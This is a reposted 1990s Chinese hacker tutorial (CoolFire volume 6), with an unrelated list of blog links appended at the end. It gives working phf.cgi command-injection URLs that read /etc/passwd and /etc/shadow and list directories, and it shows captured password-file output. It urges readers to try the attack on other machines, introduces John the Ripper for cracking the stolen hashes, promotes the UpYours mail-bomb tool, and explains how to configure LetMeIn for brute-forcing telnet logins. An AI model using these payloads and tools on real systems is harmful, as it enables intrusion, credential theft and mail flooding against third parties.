作者:CoolFire [coolfires@hotmail.com] (2001-10-14 07:05:00)
CoolHC Volume 6 By CoolFire Author E-Mail: coolfire@cyberspace.org


林正隆,中国台湾著名黑客,中国黑客领军人物。2011年获得COG信息安全终身成就奖
林正隆-百度百科

说明:本系列文章是整理Coolfire的8篇黑客入门文章,因在浏览网上相关文章的时候,要么残缺不全,要么文章排版极乱,阅读体验极差,为了获得更好的阅读体验故而做此整理。


这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !!

在昨天, 我们的首页造访人数破万了~~ 应该是增加了很多人, 而不是有人故意灌水的吧? 希望新朋友们能喜欢我们的内容, 有人问到: 有没有跟我们首页性质相近的中文站台? 很遗憾的是目前我还没有找到… 看得到的大多是软体, 注册机之类的破解站台. 如果你也有这样的站台的话, 欢迎你写信给我们进行连结. 有很多网友报怨档案抓不下来, 先前我们已经尽了很大的努力将档案放在国内 Server 中, 我想, 由 HiNet 连这边应该很快吧? 还是水管塞住的问题?? 如果有人的位址在 .edu.tw 附近的, 欢迎来信要求 Mirror~~ 我很乐意将档案 Mirror 给你, 让其它网友更方便取这些档案.

好久没有再弄出一些文章出来了, 不过最近倒是回了蛮多关於 Hacker 方面的问题, 也收到了许多的回应信件, 有许多的问题在这一篇文章中都会有答案, 甚至到现在还有很多的网友们询问甚么是 shadow password 的, 请各位多翻翻以前的文章吧!! 在 CGI Holes 方面的问题也很多, 所以在这一篇之後我会找个时间写一写 System Holes #2 来让大家对一些网路上常见的程式漏洞有一些基本的认识.

最近有许多软体更新了, 最令我们注意的当然就是 NT 4.0 罗, 因为它的更新肯定会带来很多的人更新系统, 当然这样先进的作业系统我们还是很期待有人会很快的将它的 Bugs 找出来的啦!! UpYours 这套重量级的 MailBomb 也出现的新的版本, 这次的 V4.0 Beta 2 经试用後发现实在是改进了很多, 但是相对的危险性也跟著提高, 其改用 Delphi 来设计, 使得安装更为方便, 不过
美中不足的是 beta2 的版本有些功能尚未改好, 光看到功能就让人哈翻了~~:) 这套 beta2 的版本目前在我们的首页上可以找得到, 相信它的正式版本很快就会完成~~

关於 MailBomb: 我们的首页上所提供的 MailBomb 仅供大家作为测试用, 请勿拿来开玩笑或是对别人的信箱进行轰炸, 日前此类事件造成某些的 ISP 当机, 慎至还有导致 Mail Server 记忆体不足的情况 (哪个人这么狠??), 我们也发现最近网路越来越慢了, 因为水管上积了太多要跟我们抢宽度的垃圾信件. 请大家以学习的心来使用这些 Bombs… 不要没事就拿来炸人好吗 ?? Then enjoy new one~


[CGI Hole (phf.cgi) 的延伸]

这次的主题想了好久, 一直都没有想到, 不过日前有一个屋漏偏逢连夜雨的某国营事业, 在几经下X雨及漏X的风波之後, 在他们的主机上发现了很好玩的状况, 原本我们在使用 phf.cgi 来抓 /etc/passwd的时候, 在 Browser 的 Location 中是下:

http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd  root:x:0:1:0000-Admin(0000):/:/sbin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nadm:x:45:2::/usr/bin:/sbin/sh
iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript
news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh
ftp:x:106:101:Anonymous FTP:/export/ftp:/bin/false
hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh
dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh
ming:x:133:1::/home1/ming:/usr/bin/ksh
charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh
iiimail:x:142:6::/home/iiimail:/usr/lib/rsh
charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh
webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh
mark:x:171:1::/home1/mark:/usr/lib/rsh
jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh
ibgchen:x:224:1::/home1/ibgchen:/usr/lib/rsh

但是如果没有, 或是 shadow 的话, 你可能会接著试:

http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow

但是有时候虽然 phf.cgi 这个程式的漏洞没有被补上, 还是有很多的机器不理会这个指令, 不过当这个指令生效, 但是你看到的却是一个 shadow 过的 passwd 的时候, 请不要灰心, 因为这台机器已经在你的手中了, 为甚么呢 ?? 我们来玩看看一些简单的 Unix shell command 你就会知道了~~

http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20-a%20/etc

Query Results

/usr/local/bin/ph -m alias=x /bin/ls -l -a /etc  total 466
-rw-r--r-- 1 root root 38 May 2 1996 #etcnamed.boot#
-rw-r--r-- 1 root root 20579 May 1 1996 #sendmail.cf#
drwxr-xr-x 11 root root 2048 Apr 17 13:07 .
drwxr-xr-x 24 root root 1024 Mar 26 08:16 ..
-rw-r--r-- 1 root root 2167 Aug 24 1995 DIR_COLORS
-rw-r--r-- 1 root root 15 May 1 1996 HOSTNAME
-rw-r--r-- 1 root root 4 Feb 24 1993 NETWORKING
-rw-r--r-- 1 root root 48 Dec 30 1994 NNTP_INEWS_DOMAIN
-rw-r--r-- 1 root root 0 May 13 1994 at.deny
drwxr-xr-x 2 root root 1024 Apr 11 1996 backups
-rw-r--r-- 1 root root 1212 Jul 10 1993 bootptab
-rw-r--r-- 1 root root 0 Feb 15 1994 csh.cshrc
-rw-r--r-- 1 root root 893 Apr 12 1996 csh.login
drwxr-xr-x 2 root root 1024 Apr 16 1996 default
-rw-r--r-- 1 root root 154 Aug 21 1994 exports
-rw-r--r-- 1 root root 0 May 13 1995 fastboot
-rw-r--r-- 1 root root 1118 Jan 28 1994 fdprm
drwxr-xr-x 2 root root 1024 Apr 12 1996 fs
-rw-r--r-- 1 root root 250 Dec 9 19:19 fstab
-rw-r--r-- 1 root root 242 Dec 5 13:55 fstab~
-rw-r--r-- 1 root root 1915 Jan 27 07:46 ftpaccess
-rw-r--r-- 1 root root 368 Aug 1 1994 ftpconversions
-rw-r--r-- 1 root root 0 Aug 9 1994 ftpgroups
-rwxr-xr-x 1 root root 50 May 1 1996 ftponly
-rw-r--r-- 1 root root 501 Apr 26 1996 ftpusers
-rw-r--r-- 1 root root 76 Aug 21 1994 gateways
-rw-r--r-- 1 root root 669 May 19 1994 gettydefs
-rw-r--r-- 1 root root 291 Jun 6 1996 group
-rw-r--r-- 1 root root 27 Jul 7 1994 host.conf
-rw-r--r-- 1 root root 628 Jul 12 1996 hosts
-rw-r--r-- 1 root root 600 Jan 6 10:18 hosts.allow
-rw-r--r-- 1 root root 341 May 9 1996 hosts.deny
-rw-r--r-- 1 root root 313 Mar 16 1994 hosts.equiv
-rw-r--r-- 1 root root 302 Sep 23 1993 hosts.lpd
-rw-r--r-- 1 root root 653 Apr 24 1996 hosts~
lrwxrwxrwx 1 root root 1 Apr 12 1996 inet -> .
-rw-r--r-- 1 root root 3677 Jan 6 10:20 inetd.conf
-rw-r--r-- 1 root root 3664 Apr 23 1996 inetd.conf~
-rw-r--r-- 1 root root 2351 Apr 18 1996 inittab
-rw-r--r-- 1 root root 2046 Jul 28 1994 inittab.gettyps.sample
-rw-r--r-- 1 root root 27 Apr 17 12:43 issue
-rw-r--r-- 1 root root 3 Apr 17 12:43 klogd.pid
-rw-r--r-- 1 root root 1223 Apr 17 12:43 ld.so.cache
-rw-r--r-- 1 root root 71 Aug 14 1995 ld.so.conf
drwxr-xr-x 2 root root 1024 Apr 12 1996 lilo
-rw-r--r-- 1 root root 479 Apr 13 1996 lilo.conf
-rw-r--r-- 1 root root 479 Apr 13 1996 lilo.conf.bak
-rw-r--r-- 1 root root 266 Apr 17 12:42 localtime
-rw-r--r-- 1 root root 76873 Oct 17 1995 magic
-r--r--r-- 1 root root 105 May 8 1994 mail.rc
-rw-r--r-- 1 root root 14 Apr 17 12:43 motd
drwxr-xr-x 2 root root 1024 Aug 1 1994 msgs
-rw-r--r-- 1 root root 151 Apr 17 20:43 mtab
-rw-r--r-- 1 root root 833 Jun 29 1994 mtools
-r--r--r-- 1 root root 974 Apr 17 11:48 named.boot
-r--r--r-- 1 root root 2568 May 2 1996 named.boot,v
-r--r--r-- 1 root root 764 Mar 8 16:54 named.boot.v1
-r--r--r-- 1 root root 813 Mar 17 08:45 named.boot.v2
-r--r--r-- 1 root root 521 Apr 18 1996 named.boot.~1.3~
-r--r--r-- 1 root root 566 Apr 19 1996 named.boot.~1.4~
-r--r--r-- 1 root root 566 Apr 19 1996 named.boot.~1.5~
-r--r--r-- 1 root root 707 Mar 5 08:32 named.boot.~1.6~
-rw-r--r-- 1 root root 566 Apr 19 1996 named.boot~
-rw-r--r-- 1 root root 235 May 1 1996 networks
-rw-r--r-- 1 root root 237 Apr 24 1996 networks~
-rw-r--r-- 1 root root 0 May 8 1995 nntpserver
-rw-r--r-- 1 root root 36 Sep 12 1994 organization
-rw-r--r-- 1 root root 1727 Apr 17 13:07 passwd
-r--r--r-- 1 root root 1662 Apr 17 13:06 passwd-
-rw-r--r-- 1 root root 1715 Apr 17 13:06 passwd.OLD
-rw-r--r-- 1 root root 1494 Feb 12 14:22 passwd.old
-rw-r--r-- 1 root root 1354 Jun 6 1996 passwd~
drwxr-xr-x 2 root root 1024 Jul 9 1994 ppp
-rw-r--r-- 1 root root 2240 May 20 1994 printcap
-rw-r--r-- 1 root root 1083 Apr 12 1996 profile
-rw-r--r-- 1 root root 595 Aug 21 1994 protocols
drwxr-xr-x 2 root root 1024 Jan 3 23:59 rc.d
-rw-r--r-- 1 root root 41 May 1 1996 resolv.conf
-rw-r--r-- 1 root root 65 Jan 31 1996 resolv.conf~
-rw-r--r-- 1 root root 743 Aug 1 1994 rpc
-rw-r--r-- 1 root root 87 Jun 6 1996 securetty
-r--r--r-- 1 root root 20579 May 1 1996 sendmail.cf
-r--r--r-- 1 root root 21332 May 1 1996 sendmail.cf,v
-rw-r--r-- 1 root root 20541 Apr 13 1996 sendmail.cf~
-rw-r--r-- 1 root root 408 Apr 25 17:17 sendmail.st
-rw-r--r-- 1 root root 5575 Aug 1 1994 services
-rw-r--r-- 1 root root 68 Jun 6 1996 shells
drwxr-xr-x 3 root root 1024 Nov 13 1994 skel
-rw-r--r-- 1 root root 314 Jan 10 1995 slip.hosts
-rw-r--r-- 1 root root 342 Jan 10 1995 slip.login
-rw-r--r-- 1 root root 455 Aug 1 1994 snooptab
-rw------- 1 root users 524 Jul 18 1996 ssh_host_key
-rw-r--r-- 1 root users 327 Jul 18 1996 ssh_host_key.pub
-rw------- 1 root users 512 Mar 10 09:03 ssh_random_seed
-rw-r--r-- 1 root users 607 Jul 18 1996 sshd_config
-rw-r----- 1 root root 501 Apr 26 1996 syslog.conf
-rw-r--r-- 1 root root 3 Apr 17 12:43 syslog.pid
-rw-r--r-- 1 root root 183942 Aug 9 1995 termcap
-rw-r--r-- 1 root root 126 Nov 24 1993 ttys
lrwxrwxrwx 1 root root 13 Apr 12 1996 utmp -> /var/adm/utmp
drwxr-xr-x 2 root root 1024 Aug 25 1995 vga
lrwxrwxrwx 1 root root 13 Apr 12 1996 wtmp -> /var/adm/wtmp
-rw-r--r-- 1 root root 76 May 8 1995 yp.conf.example
lrwxrwxrwx 1 root root 7 Apr 12 1996 zprofile -> profile

上面的 %20 所代表的是 [Space] 也就是空白键啦! 那上面这个 Location 就如同我们已经 Telnet 到这台机器上, 下了: ls -l -a /etc 这个指令一样, 嗯… 也就是说…KaTeX parse error: Expected group after '^' at position 1: ^̲^*^@@# OK! 当你抓 /etc/passwd 所抓到的是 shadow 过的 passwd 档, 你一定会要抓真正的 shadow 档来作"配对" 的动作… 所以呢, 下了 ls 指令来找找看到底真的 shadow 是藏在哪里, 当然你可以看的不
只是 /etc 这个目录, 任何目录你都可以看, 当然你可以使用的也不只是 cat 及 ls 这两个指令, 你可以用更多的指令~~ 那么还有甚么作不到的呢 ??? 我想可能还是有很多哩~~ 因为 phf.cgi 好像只把你所下的指令丢给 shell 後直接拦下它输出的结果, 也就是如果像是 /bin/passwd userid 这样的指令就不能用~ 因为它会要等你输入下一个字串~~ 除非先写入一个档案, 然後用来代入 “<”… 嗯…最近很忙, 没有空作这些无聊事, 不过 phf.cgi 还真的蛮好玩的, 我已经试了好几台机器都可以看到文件内容及档案, 目录… 当然~ 没有破坏就是了~~

经过这样的说明, 你是不是有些 Idea ?? 还是记起以前有试过其它的机器的 phf.cgi 也可以这样子玩的 ?? 嗯~ 再连过去玩玩看吧! 发挥一下你的想像力~~ /etc/passwd 很容易就可以得手的喔~~ 对了~ 不要乱搞政府机关 or 你们的学校啦!!~~
---------------------------------------------

[Crack 工具介绍] John the Ripper V1.4 [Size:743K]

记得先前一直介绍大家使用 CJack V1.4 来破解密码档, 那是因为它 “够快”, 在 Encrypt 的速度及比对的速度上实在快了很多, 但是之後由於很多网友的作业环境是在 Windows 95 之下, 所以 Jack不能跑, 我们就介绍大家使用 John the Ripper V1.1 这个 Passwrod Cracker~ 现在这套 Cracker出了新的版本了, 经过我们的试用觉得应该好好的为它介绍一番, 原来一直声称速度上比 CJack14还要快的 John, 经过实际上的测试, 总感觉速度没有 Jack 来得快, 虽然作者声称是因为他们这支程式是以 486 机器作最佳化的, 在 386 上跑起来会比较慢, 但是旧的 V1.1 实在是比 Jack 还要慢这也是大家都看得到的事实.

而 1.4 版在 EnCrypt 上实在是下了点功夫, 也对 Win32 版本有了支援, 当你下载解开後会发现里面有 DOS.ZIP WIN32.ZIP SOURCE.TGZ 这三个档, 分别是在 DOS 下使用的版本, Win95,NT 下使用的版本及 Unix 下使用的版本, 这时针对你所运用的作业环境作个选择, 将档案解开即可直接使用.

你还要再解开 COMMON.ZIP(共用档) 及 DOC.ZIP(说明档), 经过测试速度上明显提升很多, 但是我不敢讲它比 Jack 要快多少, 至少在我的 Pentium 133 的机器上跑起来觉得差不多, 也没有谁比较快谁比较慢的感觉~~ 不过以这样的档案大小 (7xxK) 能同时包含三种作业系统, 实在是不错的选择!!

当然这个程式里面只含了一个小小的字典档供你测试, 想要发挥它最大的效能还是先要有一个不错的字典档, 但是新的版本中可以让你设定自动产生序数及字串比对(之前的好像也有吧?), 至於如何操作, 我想他跟 Jack 及前一版本的操作方法相同, 就不用再多作介绍了~~ 以下是它的执行画面:

John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer Usage: john [flags] [passwd files]
Flags: -pwfile:<file>[,..] specify passwd file(s)
-wordfile:<file> -stdin wordlist mode, read words from <file> or stdin
-rules enable rules for wordlist mode
-incremental[:<mode>] incremental mode [using john.ini entry <mode>]
-single single crack mode
-external:<mode> external mode, using john.ini entry <mode>
-restore[:<file>] restore session [from <file>]
-makechars:<file> make a charset, <file> will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:<login|uid>[,..] crack this (these) user(s) only
-shells:[!]<shell>[,..] crack users with this (these) shell(s) only
-salts:[!]<count> crack salts with at least <count> accounts only
-lamesalts assume plaintext passwords were used as salts
-timeout:<time> abort session after a period of <time> minutes
-list list each word
-beep -quiet beep or don't beep when a password is found
-noname -nohash don't use memory for login names or hash tables
-des -md5 force DES or MD5 mode

有没有看到最後一行? 有 MD5 mode 的支援了哩~~~

嗯… 介绍完了! 当然! 这支程式我们也传回来了, 你可以在我们的首页找到, 或者你也可以试者 archie 看看有哪些 ftp site 有, 它的档名是 ucfjohn3.zip ENJOY~


CoolFire FAQ

许多东西没有空整理, 但是还是收集了一部分的问答出来, 如果这边有的就不要再来信询问了喔!!

[Q0]
我抓了 KOS 但是抓到 1.2MB 左右就停了, 不晓得哪里还可以抓到.

[A0]
如果你是想要我们站上 KOS 中的字典档, 那么很报歉, 因为这东西只有本站的 KOS 中有包,在别的地方抓到的 KOS 不含我们这个字典档 (这是我们自己加料过的, 其它程式相同), 这也是为甚么首页上的 KOS 如此大了~ 如果你所要的是 KOS 的程式, 那么你可以到 www.yahoo.com 这个搜寻引擎中找 “globalkos” 这个字串, 会有很多地下站台的列表, 接著你就可以在这些地
方找一个连线速度较快的主机抓取 KOS 了~~

[Q1]
我尝试用 NETTERM 及 LetMeIn 进入自己所建立的纟统(SCO Unix V).
1. 因为帐号是本人的,所以我将密码放於在字典档第三行内.
2. 在LetMeIn中选定我的字典档.
3. 在NETTERM中输入我的帐号,然後按输入键.
4. 在Password 的出现後回到LetMeIn.
5. 按Start Break.
6. 当Delay Time到了,键盘上的"NumLock"闪过不停, 不过,过了第三行(猜想 … 很久)也没有反应.老是停在Password这个浮标傍.
7. 当再选LetMeIn後看见字典档内的字逐一出现於最低的行内. 这好像没有按输入键. 请替我解答,可以么? 还想问问在那里可找到新的LetMeIn 及ClayMore版本 多谢帮忙.

[A1]

  1. 连上主机, 待 user: 出现时不用输入你的 user id.
  2. 启动 LetMeIn 1.0 选定字典档
  3. 在 Setup Keys 中输入你的 User ID 并加上一个 ‘~’ 号(代表 Enter
  4. 在 After Keys 中输入 ‘~’ 号, 表示密码输入完也要按 Enter.
  5. 按下 Start Break, 在时间倒数完毕前将滑鼠点一下 telnet (Netterm)程式视窗, 等待自动输入~~~~

    CoolFire系列讲座 第6讲相关推荐

    1. 朱永官院士主持:城市科学与可持续发展在线系列讲座第14讲

      USS:城市科学与可持续发展 在线系列讲座 城市科学与可持续发展讲座简介 城市科学与可持续发展(Urban Science and Sustainability, USS)在线系列讲座由中国科学院城市 ...

    2. lass翻译_【专题讲座】政务翻译人才培训系列讲座(1)

      12月4日,笔译队邀请苏州大学杜争鸣教授为笔译队做政务翻译人才培训讲座第一讲.在此次讲座中,杜争鸣老师以<自然英语学习法>为蓝本,介绍了自然英语学习法.作为系列讲座的第一讲,杜老师选择先不 ...

    3. 计算机课程 图层关系认识 课件,PhotoShop系列视频讲座(八讲)

      PhotoShop被大家简称为"PS",和CAD一样,PhotoShop是建筑规划专业的学生必须掌握的一款软件,其重要性毋庸赘言. PhotoShop是在全世界普及率二位的位图处理 ...

    4. if嵌套while循环语句_选考VB算法专题系列讲座13嵌套If和多分支语句

      视频内容: 本视频是给学生复习If语句时的授课内容,长长的寒假过后,很多学生连最基本的东西的忘记了,只好从最简单的开始复习.本视频讲解了使用嵌套If和多分支语句解决的两个问题,讲解非常详细,基础不够扎 ...

    5. C#线程系列讲座(4):同步与死锁

      本文为原创,如需转载,请注明作者和出处,谢谢! 上一篇:C#线程系列讲座(3):线程池和文件下载服务器   虽然线程可以在一定程度上提高程序运行的效率,但也会产生一些副作用.让我们先看看如下的代码: ...

    6. 摄影知识系列讲座 - 第一章《光圈、快门篇》

      is2is 色廊 摄影交流园地 - 摄影知识系列讲座 - 第一章<光圈.快门篇> hotoboy版权所有,任何媒体转载须得到作者书面授权 摄影知识讲座 光圈.快门篇(一)     首先建议 ...

    7. 贫民窟里的WPF系列讲座(一)

      最近讲了一套完整的WPF课程,感觉教学效果还很不错.我准备给MSDN录15期左右的事情,这几篇文章是配合视频一起来看的.我相信大家都是很喜欢研究新技术的,但是研究新技术的时候会遇到很多困难,譬如书籍的 ...

    8. 071-JAVA项目实训:仿QQ即时通讯软件系列讲座六(讲解QQ主界面功能)

      [上一讲]070-JAVA项目实训:仿QQ即时通讯软件讲座五(讲解用户注册功能)_CSDN专家-赖老师(软件之家)的博客-CSDN博客 [下一讲]072-JAVA项目实训:仿QQ即时通讯软件系列讲座七 ...

    9. 格林纳达常驻WTO大使孙宇晨受邀出席世贸组织首脑系列讲座

      3月24日,格林纳达常驻世界贸易组织代表.特命全权大使孙宇晨(Justin Sun)发布推特表示,应世界贸易组织(WTO)总干事伊维拉(Ngozi Okonjo-Iweala)邀请,在线出席了首场世贸 ...

    10. 《MSDN WebCast网络广播系列讲座2005年全集 更新完成》

      <MSDN WebCast网络广播系列讲座2005年全集 更新完成>(MSDN WebCast)[ISO] eMule资源 下面是用户共享的文件列表,安装eMule后,您可以点击这些文件名 ...

    最新文章

    1. Cisco交换机与路由器的密码恢复_路由交换
    2. 解决Tomcat启动时出现的The APR based Apache Tomcat Native library异常
    3. IT项目管理总结:第二章 项目管理和IT背景
    4. arm for asterisk1.8
    5. java8收集器,Java 8中的收集器collectionAndThen()方法
    6. 两个数据库表同步的可视化WEB同步程序
    7. CPU飙高 解决方法
    8. Yii2 log分析
    9. Intergate flot with Angular js ——Angular 图形报表
    10. c语言饭卡管理系统_C语言饭卡管理系统毕业设计(含毕业论文、程序源码)论文字数:15422字 C0004-C语言毕业设计下载-华软网...
    11. android 微信小程序 gps 飘,微信小程序实现自动定位功能
    12. 《工作五年,决定你一生的财富》读后感
    13. 音视频系列--MediaProjection录屏生成H264和H265文件
    14. 一台计算机安装几个操作系统,电脑装3个系统-一台电脑可以安装几个操作系统?...
    15. 合作小红书探店博主需要注意什么?流程是怎样的?
    16. 题目 1904: 蓝桥杯算法提高VIP-求arccos值
    17. 一文带你了解SLB、F5、Nginx负载均衡
    18. nodejs安装weinre 及移动端调试网页
    19. 爬十格阶梯每次一步或两步_爬上信息阶梯
    20. 初步了解Panda3D 雾(Fog)

    热门文章

    1. win10安装visio2010出错_win7安装Office Visio 2010时出现错误怎么办
    2. android斗鱼app源代码,android文件管理器源码、斗鱼直播源码、企业级erp源码等
    3. 局域网文件共享服务器软件,局域网文件夹加密工具哪个好?文件共享服务器软件介绍...
    4. 干货 | 利用SPSS进行高级统计分析第四期
    5. YDOOK:STM32: 最新版选型手册下载 2021
    6. 引入pingfang SC字体
    7. Java程序设计基础------Java基础
    8. Java实现密码加密
    9. 性能测试案例模板 性能测试用例模板 测试案例 性能用例 模板 容我想想之性能测试系列培训...
    10. android 物业管理系统,基于Android的物业管理系统